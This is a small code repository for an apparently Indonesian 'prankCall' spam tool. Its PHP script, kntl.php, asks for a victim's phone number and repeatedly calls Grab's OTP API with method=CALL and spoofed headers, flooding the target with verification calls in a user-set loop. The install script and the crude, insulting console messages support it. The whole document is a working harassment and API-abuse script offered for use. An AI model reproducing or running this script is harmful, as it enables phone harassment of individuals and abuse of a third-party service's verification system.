├── README.md ├── install.sh └── kntl.php /README.md: -------------------------------------------------------------------------------- 1 | # HAI BANGSAT! 2 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | pkg update 2 | pkg upgrade 3 | apt-get install php -y 4 | apt install git -y 5 | php SpamCall.php 6 | 7 | 8 | -------------------------------------------------------------------------------- /kntl.php: -------------------------------------------------------------------------------- 1 | number = $no; } 8 | private function get(){ return trim(fgets(STDIN)); } 9 | private function correct($no){ $cek = substr($no,0,2); 10 | if($cek=="08"){ $no = "62".substr($no,1); } return $no; } 11 | private function ekse(){ $no = $this->correct($this->number); $rand = rand(0123456,9999999); $rands = $this->randStr(12); $post = "method=CALL&countryCode=id&phoneNumber=$no&templateID=pax_android_production"; $h[] = "x-request-id: ebf61bc3-8092-4924-bf45-$rands"; $h[] = "Accept-Language: in-ID;q=1.0, en-us;q=0.9, en;q=0.8"; $h[] = "User-Agent: Grab/5.20.0 (Android 6.0.1; Build $rand)"; $h[] = "Content-Type: application/x-www-form-urlencoded"; $h[] = "Content-Length: ".strlen($post); $h[] = "Host: api.grab.com"; $h[] = "Connection: close"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://api.grab.com/grabid/v1/phone/otp"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_HTTPHEADER, $h); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $x = curl_exec($ch); curl_close($ch); $ekse = json_decode($x,true); if(empty($ekse['challengeID'])){ echo " [•] \e[1;31mMampus Gagal\n\n"; }else{ echo " \e[1;32m[√] \e[1;93mSukses Bngst\n\n"; } } private function loop($many,$sleep=null){ $a=0; $no = $this->correct($this->number); while($a<$many){ $rand = rand(0123456,9999999); $rands = $this->randStr(12); $post = "method=CALL&countryCode=id&phoneNumber=$no&templateID=pax_android_production"; $h[] = "x-request-id: ebf61bc3-8092-4924-bf45-$rands"; $h[] = "Accept-Language: in-ID;q=1.0, en-us;q=0.9, en;q=0.8"; $h[] = "User-Agent: Grab/5.20.0 (Android 6.0.1; Build $rand)"; $h[] = "Content-Type: application/x-www-form-urlencoded"; $h[] = "Content-Length: ".strlen($post); $h[] = "Host: api.grab.com"; $h[] = "Connection: close"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://api.grab.com/grabid/v1/phone/otp"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_HTTPHEADER, $h); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $x = curl_exec($ch); curl_close($ch); $ekse = json_decode($x,true); if(empty($ekse['challengeID'])){ continue; }else{ $nn = $a+1; echo "\e[1;32m [$nn] Meluncurkan Roket\r"; $a++; } if($sleep!=null) sleep($sleep); if($a>=$many) echo "\n \e[1;32m[√] \e[1;93mSelesai cok!\n\n"; } } private function randStr($l){ $data = "abcdefghijklmnopqrstuvwxyz1234567890"; $word = ""; for($a=0;$a<$l;$a++){ $word .= $data{rand(0,strlen($data)-1)}; } return $word; } public function run(){ while(true){ echo " [+] Spam Mode? (y/n): "; $loop = $this->get(); if($loop=="y" OR $loop=="n"){ break; }else{ echo "Dasar Bocah Kontol n\n"; continue; } } if($loop=="y"){ echo " [+] Jumlah Spam: "; $many = $this->get(); $this->loop($many); }else{ $this->ekse(); } } } 12 | echo " \n\n\n\n\n\n\n\n"; echo " \n\n\n\n\n\n\n\n"; echo "\n\n\n\n\n\n\n\n"; echo "\n"; echo " \n"; echo " \n"; 13 | echo "\e[1;32m 14 | _________-----_____ 15 | _____------ __ ----_ 16 | ___---- ___------ \ 17 | ----________ ---- \ 18 | -----__ | _____) 19 | __- / \ 20 | _______----- ___-- \ /)\ 21 | ------_______ ---____ \__/ / 22 | -----__ \ -- _ /\ 23 | --__--__ \_____/ \_/\ 24 | ----| / | 25 | \e[1;96m ┌─┐┌─┐┌─┐┌┬┐┌─┐┌─┐┬ ┬ \e[1;32m | |___________| 26 | \e[1;96m └─┐├─┘├─┤││││ ├─┤│ │ \e[1;32m | | ((_(_)| )_) 27 | \e[1;96m └─┘┴ ┴ ┴┴ ┴└─┘┴ ┴┴─┘┴─┘ \e[1;32m | \_((_(_)|/(_) 28 | \e[0;90mBy: NjankSoekamti\e[1;32m \ ( 29 | \_____________) 30 | "; system ('echo'); sleep ('0.4'); echo " [+] No Target: "; $no = get(); $n = new prankCall($no); $n->run(); 31 | ?> --------------------------------------------------------------------------------